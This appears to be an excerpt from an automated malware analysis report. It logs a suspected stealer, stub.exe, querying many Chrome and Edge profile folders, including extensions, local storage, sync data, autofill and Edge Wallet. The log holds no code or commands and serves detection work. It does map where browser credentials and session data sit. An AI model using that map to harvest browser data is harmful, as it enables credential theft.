                  Source: C:\Users\user\AppData\Local\Temp\onefile_1364_133790045022616316\stub.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\images VolumeInformationJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\onefile_1364_133790045022616316\stub.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\_locales VolumeInformationJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\onefile_1364_133790045022616316\stub.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\_locales\bg VolumeInformationJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\onefile_1364_133790045022616316\stub.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\_locales\fil VolumeInformationJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\onefile_1364_133790045022616316\stub.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\_locales\fr VolumeInformationJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\onefile_1364_133790045022616316\stub.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\_locales\hu VolumeInformationJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\onefile_1364_133790045022616316\stub.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Feature Engagement Tracker VolumeInformationJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\onefile_1364_133790045022616316\stub.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Feature Engagement Tracker\EventDB VolumeInformationJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\onefile_1364_133790045022616316\stub.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network VolumeInformationJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\onefile_1364_133790045022616316\stub.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\optimization_guide_hint_cache_store VolumeInformationJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\onefile_1364_133790045022616316\stub.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\optimization_guide_model_metadata_store VolumeInformationJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\onefile_1364_133790045022616316\stub.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\optimization_guide_prediction_model_downloads\1dcaa933-a69d-41cc-acb5-708980d119e5 VolumeInformationJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\onefile_1364_133790045022616316\stub.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\optimization_guide_prediction_model_downloads\697416b8-55c0-41ac-9636-a06aa38f99e9 VolumeInformationJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\onefile_1364_133790045022616316\stub.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\optimization_guide_prediction_model_downloads\84b89d2b-fec7-4b59-87f2-603dcfbd43dd VolumeInformationJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\onefile_1364_133790045022616316\stub.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\PersistentOriginTrials VolumeInformationJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\onefile_1364_133790045022616316\stub.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Segmentation Platform VolumeInformationJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\onefile_1364_133790045022616316\stub.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Session Storage VolumeInformationJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\onefile_1364_133790045022616316\stub.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sessions VolumeInformationJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\onefile_1364_133790045022616316\stub.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\shared_proto_db\metadata VolumeInformationJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\onefile_1364_133790045022616316\stub.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Storage\ext\nmmhkkegccagdldgiimedpiccmgmieda VolumeInformationJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\onefile_1364_133790045022616316\stub.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Storage\ext\nmmhkkegccagdldgiimedpiccmgmieda\def VolumeInformationJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\onefile_1364_133790045022616316\stub.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Storage\ext\nmmhkkegccagdldgiimedpiccmgmieda\def\Cache VolumeInformationJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\onefile_1364_133790045022616316\stub.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Storage\ext\nmmhkkegccagdldgiimedpiccmgmieda\def\Cache\Cache_Data VolumeInformationJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\onefile_1364_133790045022616316\stub.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Storage\ext\nmmhkkegccagdldgiimedpiccmgmieda\def\Code Cache\js\index-dir VolumeInformationJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\onefile_1364_133790045022616316\stub.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Storage\ext\nmmhkkegccagdldgiimedpiccmgmieda\def\GPUCache VolumeInformationJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\onefile_1364_133790045022616316\stub.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Applications VolumeInformationJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\onefile_1364_133790045022616316\stub.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Applications\Manifest Resources VolumeInformationJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\onefile_1364_133790045022616316\stub.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Applications\Manifest Resources\aghbiahbpaijignceidepookljebhfak VolumeInformationJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\onefile_1364_133790045022616316\stub.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Applications\Manifest Resources\aghbiahbpaijignceidepookljebhfak\Icons Maskable VolumeInformationJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\onefile_1364_133790045022616316\stub.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Applications\Manifest Resources\agimnkijcaahngcdmfeangaknmldooml\Icons VolumeInformationJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\onefile_1364_133790045022616316\stub.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Applications\Manifest Resources\agimnkijcaahngcdmfeangaknmldooml\Icons Maskable VolumeInformationJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\onefile_1364_133790045022616316\stub.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Applications\Manifest Resources\fhihpiojkbmbpdjeoajapmgkhlnakfjf VolumeInformationJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\onefile_1364_133790045022616316\stub.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Applications\Manifest Resources\fhihpiojkbmbpdjeoajapmgkhlnakfjf\Icons VolumeInformationJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\onefile_1364_133790045022616316\stub.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Applications\Manifest Resources\fhihpiojkbmbpdjeoajapmgkhlnakfjf\Icons Maskable VolumeInformationJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\onefile_1364_133790045022616316\stub.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Applications\Manifest Resources\fmgjjmmmlfnkbppncabfkddbjimcfncm VolumeInformationJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\onefile_1364_133790045022616316\stub.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Applications\Manifest Resources\fmgjjmmmlfnkbppncabfkddbjimcfncm\Icons VolumeInformationJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\onefile_1364_133790045022616316\stub.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Applications\Temp VolumeInformationJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\onefile_1364_133790045022616316\stub.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\WebStorage VolumeInformationJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\onefile_1364_133790045022616316\stub.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\FileTypePolicies VolumeInformationJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\onefile_1364_133790045022616316\stub.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\FirstPartySetsPreloaded VolumeInformationJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\onefile_1364_133790045022616316\stub.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\GraphiteDawnCache VolumeInformationJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\onefile_1364_133790045022616316\stub.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\GrShaderCache VolumeInformationJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\onefile_1364_133790045022616316\stub.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\hyphen-data VolumeInformationJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\onefile_1364_133790045022616316\stub.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\MEIPreload VolumeInformationJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\onefile_1364_133790045022616316\stub.exeQueries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data VolumeInformationJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\onefile_1364_133790045022616316\stub.exeQueries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Autofill\4.0.0.8 VolumeInformationJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\onefile_1364_133790045022616316\stub.exeQueries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Crashpad VolumeInformationJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\onefile_1364_133790045022616316\stub.exeQueries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Crashpad\attachments VolumeInformationJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\onefile_1364_133790045022616316\stub.exeQueries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default VolumeInformationJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\onefile_1364_133790045022616316\stub.exeQueries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Asset Store\assets.db VolumeInformationJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\onefile_1364_133790045022616316\stub.exeQueries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\AutofillStrikeDatabase VolumeInformationJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\onefile_1364_133790045022616316\stub.exeQueries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Code Cache\js\index-dir VolumeInformationJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\onefile_1364_133790045022616316\stub.exeQueries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Code Cache\wasm VolumeInformationJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\onefile_1364_133790045022616316\stub.exeQueries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Download Service\Files VolumeInformationJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\onefile_1364_133790045022616316\stub.exeQueries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.66.0_0\_locales\cs VolumeInformationJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\onefile_1364_133790045022616316\stub.exeQueries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.66.0_0\_locales\my VolumeInformationJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\onefile_1364_133790045022616316\stub.exeQueries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.66.0_0\_locales\nl VolumeInformationJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\onefile_1364_133790045022616316\stub.exeQueries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.66.0_0\_locales\pl VolumeInformationJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\onefile_1364_133790045022616316\stub.exeQueries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\optimization_guide_hint_cache_store VolumeInformationJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\onefile_1364_133790045022616316\stub.exeQueries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\shared_proto_db VolumeInformationJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\onefile_1364_133790045022616316\stub.exeQueries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\shared_proto_db\metadata VolumeInformationJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\onefile_1364_133790045022616316\stub.exeQueries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Site Characteristics Database VolumeInformationJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\onefile_1364_133790045022616316\stub.exeQueries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Storage\ext\ihmafllikibpmigkcoadcmckbfhibefp VolumeInformationJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\onefile_1364_133790045022616316\stub.exeQueries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Storage\ext\ihmafllikibpmigkcoadcmckbfhibefp\def VolumeInformationJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\onefile_1364_133790045022616316\stub.exeQueries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Storage\ext\ihmafllikibpmigkcoadcmckbfhibefp\def\Cache VolumeInformationJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\onefile_1364_133790045022616316\stub.exeQueries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Storage\ext\ihmafllikibpmigkcoadcmckbfhibefp\def\Cache\Cache_Data VolumeInformationJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\onefile_1364_133790045022616316\stub.exeQueries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Storage\ext\ihmafllikibpmigkcoadcmckbfhibefp\def\Code Cache VolumeInformationJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\onefile_1364_133790045022616316\stub.exeQueries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Storage\ext\ihmafllikibpmigkcoadcmckbfhibefp\def\Code Cache\js VolumeInformationJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\onefile_1364_133790045022616316\stub.exeQueries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Storage\ext\ihmafllikibpmigkcoadcmckbfhibefp\def\Code Cache\js\index-dir VolumeInformationJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\onefile_1364_133790045022616316\stub.exeQueries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Storage\ext\ihmafllikibpmigkcoadcmckbfhibefp\def\GPUCache VolumeInformationJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\onefile_1364_133790045022616316\stub.exeQueries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Storage\ext\ihmafllikibpmigkcoadcmckbfhibefp\def\Local Storage VolumeInformationJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\onefile_1364_133790045022616316\stub.exeQueries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Storage\ext\ihmafllikibpmigkcoadcmckbfhibefp\def\Local Storage\leveldb VolumeInformationJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\onefile_1364_133790045022616316\stub.exeQueries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Storage\ext\ihmafllikibpmigkcoadcmckbfhibefp\def\Network VolumeInformationJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\onefile_1364_133790045022616316\stub.exeQueries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Storage\ext\ihmafllikibpmigkcoadcmckbfhibefp\def\Session Storage VolumeInformationJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\onefile_1364_133790045022616316\stub.exeQueries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Sync Data VolumeInformationJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\onefile_1364_133790045022616316\stub.exeQueries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Sync Data\LevelDB VolumeInformationJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\onefile_1364_133790045022616316\stub.exeQueries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\EADPData Component VolumeInformationJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\onefile_1364_133790045022616316\stub.exeQueries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\EADPData Component\4.0.2.33 VolumeInformationJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\onefile_1364_133790045022616316\stub.exeQueries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Edge Designer VolumeInformationJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\onefile_1364_133790045022616316\stub.exeQueries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Edge Designer\1.0.0.20 VolumeInformationJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\onefile_1364_133790045022616316\stub.exeQueries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Edge Fre VolumeInformationJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\onefile_1364_133790045022616316\stub.exeQueries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Edge Shopping VolumeInformationJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\onefile_1364_133790045022616316\stub.exeQueries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Edge Travel VolumeInformationJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\onefile_1364_133790045022616316\stub.exeQueries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Edge Travel\1.0.0.2 VolumeInformationJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\onefile_1364_133790045022616316\stub.exeQueries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Edge Wallet VolumeInformationJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\onefile_1364_133790045022616316\stub.exeQueries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Edge Wallet\116.16385.16360.19 VolumeInformationJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\onefile_1364_133790045022616316\stub.exeQueries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Edge Wallet\116.16385.16360.19\bnpl VolumeInformationJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\onefile_1364_133790045022616316\stub.exeQueries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Edge Wallet\116.16385.16360.19\json VolumeInformationJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\onefile_1364_133790045022616316\stub.exeQueries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Edge Wallet\116.16385.16360.19\json\i18n-ec VolumeInformationJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\onefile_1364_133790045022616316\stub.exeQueries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Edge Wallet\116.16385.16360.19\json\i18n-ec\ar VolumeInformationJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\onefile_1364_133790045022616316\stub.exeQueries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Edge Wallet\116.16385.16360.19\json\i18n-ec\de VolumeInformationJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\onefile_1364_133790045022616316\stub.exeQueries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Edge Wallet\116.16385.16360.19\json\i18n-ec\en-GB VolumeInformationJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\onefile_1364_133790045022616316\stub.exeQueries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Edge Wallet\116.16385.16360.19\json\i18n-ec\fr-CA VolumeInformationJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\onefile_1364_133790045022616316\stub.exeQueries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Edge Wallet\116.16385.16360.19\json\i18n-ec\ja VolumeInformationJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\onefile_1364_133790045022616316\stub.exeQueries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Edge Wallet\116.16385.16360.19\json\i18n-ec\pt-BR VolumeInformationJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\onefile_1364_133790045022616316\stub.exeQueries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Edge Wallet\116.16385.16360.19\json\i18n-ec\pt-PT VolumeInformationJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\onefile_1364_133790045022616316\stub.exeQueries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Edge Wallet\116.16385.16360.19\json\i18n-ec\zh-Hans VolumeInformationJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\onefile_1364_133790045022616316\stub.exeQueries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Edge Wallet\116.16385.16360.19\json\i18n-hub\ar VolumeInformationJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\onefile_1364_133790045022616316\stub.exeQueries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Edge Wallet\116.16385.16360.19\json\i18n-hub\de VolumeInformationJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\onefile_1364_133790045022616316\stub.exeQueries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Edge Wallet\116.16385.16360.19\json\i18n-hub\id VolumeInformationJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\onefile_1364_133790045022616316\stub.exeQueries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Edge Wallet\116.16385.16360.19\json\i18n-hub\it VolumeInformationJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\onefile_1364_133790045022616316\stub.exeQueries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Edge Wallet\116.16385.16360.19\json\i18n-mobile-hub VolumeInformationJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\onefile_1364_133790045022616316\stub.exeQueries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Edge Wallet\116.16385.16360.19\json\i18n-mobile-hub\pt-BR VolumeInformationJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\onefile_1364_133790045022616316\stub.exeQueries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Edge Wallet\116.16385.16360.19\json\i18n-notification VolumeInformationJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\onefile_1364_133790045022616316\stub.exeQueries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Edge Wallet\116.16385.16360.19\json\i18n-notification\es VolumeInformationJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\onefile_1364_133790045022616316\stub.exeQueries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Edge Wallet\116.16385.16360.19\json\i18n-notification-shared VolumeInformationJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\onefile_1364_133790045022616316\stub.exeQueries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Edge Wallet\116.16385.16360.19\json\i18n-notification-shared\ar VolumeInformationJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\onefile_1364_133790045022616316\stub.exeQueries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Edge Wallet\116.16385.16360.19\json\i18n-shared-components\ar VolumeInformationJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\onefile_1364_133790045022616316\stub.exeQueries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Edge Wallet\116.16385.16360.19\json\i18n-tokenized-card\ar VolumeInformationJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\onefile_1364_133790045022616316\stub.exeQueries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Edge Wallet\116.16385.16360.19\json\i18n-tokenized-card\de VolumeInformationJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\onefile_1364_133790045022616316\stub.exeQueries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Edge Wallet\116.16385.16360.19\json\i18n-tokenized-card\es VolumeInformationJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\onefile_1364_133790045022616316\stub.exeQueries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Edge Wallet\116.16385.16360.19\json\i18n-tokenized-card\fr VolumeInformationJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\onefile_1364_133790045022616316\stub.exeQueries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Edge Wallet\116.16385.16360.19\json\i18n-tokenized-card\fr-CA VolumeInformationJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\onefile_1364_133790045022616316\stub.exeQueries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Edge Wallet\116.16385.16360.19\json\i18n-tokenized-card\pt-PT VolumeInformationJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\onefile_1364_133790045022616316\stub.exeQueries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Edge Wallet\116.16385.16360.19\json\i18n-tokenized-card\zh-Hans VolumeInformationJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\onefile_1364_133790045022616316\stub.exeQueries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Edge Wallet\116.16385.16360.19\json\i18n-tokenized-card\zh-Hant VolumeInformationJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\onefile_1364_133790045022616316\stub.exeQueries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Edge Wallet\116.16385.16360.19\json\wallet VolumeInformationJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\onefile_1364_133790045022616316\stub.exeQueries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Edge Wallet\116.16385.16360.19\json\wallet\wallet-checkout VolumeInformationJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\onefile_1364_133790045022616316\stub.exeQueries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Edge Wallet\116.16385.16360.19\Mini-Wallet VolumeInformationJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\onefile_1364_133790045022616316\stub.exeQueries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Edge Wallet\116.16385.16360.19\Notification VolumeInformationJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\onefile_1364_133790045022616316\stub.exeQueries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Edge Wallet\116.16385.16360.19\Wallet-Checkout VolumeInformationJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\onefile_1364_133790045022616316\stub.exeQueries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\FirstPartySetsPreloaded VolumeInformationJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\onefile_1364_133790045022616316\stub.exeQueries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\FirstPartySetsPreloaded\2023.9.25.0 VolumeInformationJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\onefile_1364_133790045022616316\stub.exeQueries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\FirstPartySetsPreloaded\2023.9.25.0\_metadata VolumeInformationJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\onefile_1364_133790045022616316\stub.exeQueries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\GrShaderCache VolumeInformationJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\onefile_1364_133790045022616316\stub.exeQueries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Safe Browsing VolumeInformationJump to behavior
